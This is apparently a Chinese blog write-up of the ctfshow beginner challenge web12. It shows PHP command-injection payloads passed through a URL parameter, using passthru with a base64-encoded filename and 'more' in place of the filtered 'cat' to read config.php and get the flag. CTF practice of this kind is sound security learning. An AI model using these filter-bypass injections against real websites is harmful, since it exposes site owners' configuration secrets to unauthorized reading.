ctfshow-萌新-web12( 利用命令执行函数获取网站敏感信息)_ctfshow web 12

文章讲述了如何通过base64编码绕过过滤条件查看config.php文件内容,以及使用反引号执行系统命令获取文件的方法,同时提及了作者分享网络安全学习资源的背景和目的。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

base64_decode();    – base64解码,常用于参数绕过
base64_encode();    – base64加密

查看当前目录文件, 拿到 config.php文件的位置

?c=passthru('ls');

由结果可知, 文件就在当前目录下

接下来获取 config.php 文件名base64加密后的值, 这里使用 base64_encode()函数来加密, 方法不唯一, 其他方式获取加密的值也可以

加密完成后, 利用base64加密后的文件名绕过过滤条件, 查看文件内容, 由于 cat命令被过滤了, 这里使用 more 代替

?c=$a = base64_decode('Y29uZmlnLnBocA==');passthru("more $a");

页面空显示, 但也没报错

右键查看网页源码即可看到文件内容, 获取 flag

评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值